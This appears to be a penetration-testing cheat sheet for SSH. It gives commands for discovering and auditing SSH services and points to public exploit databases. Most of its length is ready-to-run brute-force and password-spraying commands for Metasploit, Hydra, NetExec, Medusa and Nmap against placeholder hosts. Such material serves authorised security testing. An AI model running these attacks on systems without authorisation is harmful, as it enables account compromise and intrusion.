Port 22 – SSH
Pentesting SSH
Navigation
Discovery and Enumeration
Several tools and techniques exist to discover SSH services across a network or on a specific device, such as a web application server. With the commands and tools outlined below, you can identify if port 22 is open and an SSH service is running. It is also important to retrieve the SSH SSH service banner, as this information can help you identify publicly available exploits for the specific product or version of SSH.
##Nmap sudo nmap -p22 -n -sV --script ssh* 10.1.1.1 #Scan for open port 22 and obtain the service banner and more. ##Netcat nc -v 10.1.1.1 22 #Use nc to manually check if port 22 is open and to fetch the banner. ##Telnet telnet 10.1.1.1 22 #Use Telnet to connect to port 22 to verify its status and retrieve the banner.
A simple Python script can connect to port 22 and display the service banner.
import socket
target = "10.1.1.1"
port = 22
with socket.create_connection((target, port), timeout=5) as s:
print(s.recv(1024).decode())
Automated ssh-audit
ssh-audit is a tool for SSH server & client configuration auditing. The main focus of ssh-audit is to identify outdated, weak, or insecure SSH configurations that may expose a system to vulnerabilities. It checks for deprecated algorithms, key exchange methods, ciphers, and potential misconfigurations, helping system administrators secure their SSH services effectively. Penetration testers can use ssh-audit during reconnaissance to gather information about an SSH server’s configuration and identify potential weaknesses.
##ssh-audit ssh-audit.py 10.1.1.1 #Basic server auditing ssh-audit.py -T servers.txt #Run a standard audit against many servers (place targets into servers.txt, one on each line in the format of HOST[:PORT])
Exploitation
Finding Public Exploits for SSH
In this phase, you will have identified that port 22 is open, and an SSH service is running on the port. (Remember, SSH can run on non-standard ports as well, so ensure you scan for other open ports that may also host SSH services.) You should have performed banner grabbing using the tools and commands outlined earlier. If the SSH service is configured to disclose its banner, you can use this information to search for publicly available exploits for the specific version.
Use the collected information to search for known vulnerabilities and exploits:
- Exploit Database (exploit-db):
Search by the SSH version or keywords such as “OpenSSH”. - CVE Details:
Look up CVEs associated with the identified version of SSH. - Rapid7 Vulnerability Database:
Find detailed vulnerability information for SSH services. - National Vulnerability Database (NVD):
Check for officially catalogued vulnerabilities.
SSH Brute Force
The SSH protocol is often a target for brute-force attacks due to its use for remote administration. If valid usernames have been identified during earlier reconnaissance, you can attempt a brute-force attack using a username:password combination list. Below are tools and techniques for conducting brute-force attacks against SSH.
Metasploit provides a module to brute-force SSH logins.
##Metasploit sudo msfconsole -q use auxiliary/scanner/ssh/ssh_login set RHOSTS 10.1.1.1 #Target IP address or range set USERPASS_FILE ssh_bruteforce.txt #File with username-password pairs set VERBOSE true #Print each login attempt set THREADS 10 #Number of concurrent threads exploit #To test specific cases: set BLANK_PASSWORDS true #Test for blank passwords set USER_AS_PASS true #Use the username as the password
Hydra is a popular tool for brute-forcing several protocols, including SSH. It can be found here: https://github.com/vanhauser-thc/thc-hydra
##Hydra hydra -l <username> -p <password> -s 22 10.1.1.1 ssh -t 4 #Test for a specific username and password hydra -l <username> -P passwords.txt -s 22 10.1.1.1 ssh -t 4 #Brute-force a single username with a password list hydra -L /path/to/usernames.txt -P passwords.txt -s 22 10.1.1.1 ssh -t 4 #Brute-force multiple usernames and passwords hydra -C ~/SecLists/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt -s 22 10.1.1.1 ssh -t 4 #Brute-force using username-password combinations hydra -C ~/SecLists/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt -s 22 -M SSH_Targets.txt ssh -t 4 #Brute-force using username-password combinations for a list of SSH servers
NetExec can be used to brute-force and password-spray SSH servers. It can be found here: https://github.com/Pennyw0rth/NetExec/releases
##Netexec #Password Spraying nxc ssh 10.1.1.0/24 -u userfile -p passwordfile --no-bruteforce --continue-on-success #Password spray SSH #Testing credentials nxc ssh 10.1.1.0/24 -u 'user' -p 'pass' #Tests credentials provided nxc ssh 10.1.1.0/24 --port 2222 #Change SSH port to non-standard port
Medusa is another brute-forcing tool with SSH support. It can be found here: https://github.com/jmk-foofus/medusa
##Medusa medusa -h 10.1.1.1 -u <username> -p <password> -M ssh #Single username and password medusa -h 10.1.1.1 -u <username> -P passwords.txt -M ssh #Single username with password list medusa -h 10.1.1.1 -U usernames.txt -P passwords.txt -M ssh #Multiple usernames and passwords medusa -H ssh_servers.txt -u <username> -p <password> -M ssh #Single username and password with list of SSH servers medusa -H ssh_servers.txt -U usernames.txt -P passwords.txt -M ssh #Multiple usernames and passwords with list of SSH servers
The Nmap scripting engine includes a script for SSH brute-forcing. Use it as follows:
##Nmap nmap -p 22 --script ssh-brute --script-args userdb=/path/to/usernames.txt,passdb=/path/to/passwords.txt <target> #With username and password list nmap -p 22 --script ssh-brute --script-args userdb=<username>,passdb=<password> <target> #With specific username-password combinations